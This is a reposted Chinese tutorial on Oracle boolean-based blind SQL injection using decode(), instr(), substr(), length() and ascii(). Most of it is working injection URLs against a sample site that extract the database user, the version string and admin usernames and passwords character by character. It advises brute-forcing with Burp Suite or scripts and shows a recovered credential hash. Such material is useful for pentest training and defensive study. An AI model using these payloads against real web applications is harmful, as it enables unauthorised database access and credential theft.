0x01 decode?函數(shù)布爾盲注

decode(字段或字段的運(yùn)算，值1，值2，值3）

這個(gè)函數(shù)運(yùn)行的結(jié)果是，當(dāng)字段或字段的運(yùn)算的值等于值1時(shí)，該函數(shù)返回值2，否則返回3

---

當(dāng)然值1，值2，值3也可以是表達(dá)式，這個(gè)函數(shù)使得某些sql語(yǔ)句簡(jiǎn)單了許多
使用方法：
比較大小

select decode(sign(變量1-變量2),-1,變量1,變量2) from dual; --取較小值

sign()函數(shù)根據(jù)某個(gè)值是0、正數(shù)還是負(fù)數(shù)，分別返回0、1、-1

例如：
變量1=10，變量2=20
則sign(變量1-變量2)返回-1，decode解碼結(jié)果為“變量1”，達(dá)到了取較小值的目的。

SQL> select decode(sign(10-20),-1,10,20) from dual;DECODE(SIGN(10-20),-1,10,20) ----------------------------10

所以這個(gè)decode函數(shù)在我們注入中的應(yīng)用

?

?

測(cè)試當(dāng)前用戶

select decode(user,'SYSTEM',1,0) from dual;

如果是system用戶則返回1，不是則返回0.

SQL> select decode(user,'SYSTEM',1,0) from dual;DECODE(USER,'SYSTEM',1,0) -------------------------1SQL> select decode(user,'SYS',1,0) from dual;DECODE(USER,'SYS',1,0) ----------------------0

注入點(diǎn)中decode盲注應(yīng)用

判斷是否是SCOTT用戶

http://www.jsporcle.com/a.jsp?username=SMITH' and 1=(select decode(user,'SCOTT',1,0) from dual) --

當(dāng)前也可以用字符逐個(gè)猜解，利用到substr()函數(shù)

http://www.jsporcle.com/a.jsp?username=SMITH' and 1=(select decode(substr(user,1,1),'S',1,0) from dual) --

這里只需要替換我們需要查的內(nèi)容即可?不一一列舉了，比如查詢Oracle版本，判斷版本的字符串第一個(gè)字符是否是O

http://www.jsporcle.com/a.jsp?username=SMITH' and 1=(select decode(substr((select banner from sys.v_$version where rownum=1),1,1),'O',1,0) from dual) --

獲取當(dāng)前用戶

(select user from dual)

獲取當(dāng)前版本

(select banner from sys.v_$version where rownum=1)
獲取當(dāng)前admin表的帳號(hào)和密碼

(select username||password from admin)
獲取字符長(zhǎng)度

select length(user) from dual --
select * from art where id=1 and 6=(select length(user) from dual) --

http://www.jsporcle.com/news.jsp?id=1 and 6=(select length(user) from dual) --

當(dāng)前用戶第一個(gè)字母的是否等于S 等于返回1否則返回0

(select decode(substr(user,1,1),'S',1,0) from dual) -- (select decode(substr(user,2,1),'Y',1,0) from dual) -- (select decode(substr(user,3,1),'S',1,0) from dual) -- (select decode(substr(user,4,1),'T',1,0) from dual) -- (select decode(substr(user,5,1),'E',1,0) from dual) -- (select decode(substr(user,6,1),'N',1,0) from dual) --

測(cè)試當(dāng)前用戶語(yǔ)句

http://www.jsporcle.com/news.jsp?id=1 and 1=(select decode(substr(user,1,1),'S',1,0) from dual) --

獲取當(dāng)前admin表的帳號(hào)和密碼

select * from art where id=1 and 1=(select decode(substr((select username||password from admin),1,1),'a',1,0) from dual) http://www.jsporcle.com/news.jsp?id=1 and 1=(select decode(substr((select username%7c%7cpassword from admin),1,1),'a',1,0) from dual)

判斷字符的字符

abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.

查詢第二個(gè)的時(shí)候

http://www.jsporcle.com/news.jsp?id=1 and 1=(select decode(substr((select username%7c%7cpassword from admin),2,1),'d',1,0) from dual) --

?

---

?大概知道這些函數(shù)的用法?跑腳本爆破即可?burpsuite為例

?

?

?0x02?instr函數(shù)布爾盲注

instr函數(shù)的使用，從一個(gè)字符串中查找指定子串的位置。例如：

SQL> select instr('abcdefgh','de') position from dual;

POSITION
----------
4

?

從1開始算 d排第四所以返回4

盲注中的應(yīng)用:

http://www.jsporcle.com/news.jsp?id=1 and 1=(instr((select user from dual),'SYS')) --

?

?BURP爆破用戶名

?

?

?

?

0x03?通用盲注方法?逐字猜解

先獲取數(shù)據(jù)長(zhǎng)度
37=(select length(username||password) from admin)
轉(zhuǎn)碼測(cè)試

http://www.jsporcle.com/news.jsp?id=1 and 37=(select length(username%7c%7cpassword) from admin)-- select * from art where id=1 and 37=(select length(username||password) from admin);

猜解ascii碼

http://www.jsporcle.com/news.jsp?id=1 and (select ascii(substr(username%7c%7cpassword,1,1)) from admin)=97 --

?

同樣?burp或腳本爆破即可

?

?

?猜解結(jié)果:? admine10adc3949ba59abbe56e057f20f883e

?

轉(zhuǎn)載于:https://www.cnblogs.com/-qing-/p/10951631.html

總結(jié)

以上是生活随笔為你收集整理的Oracle基于布尔的盲注总结的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。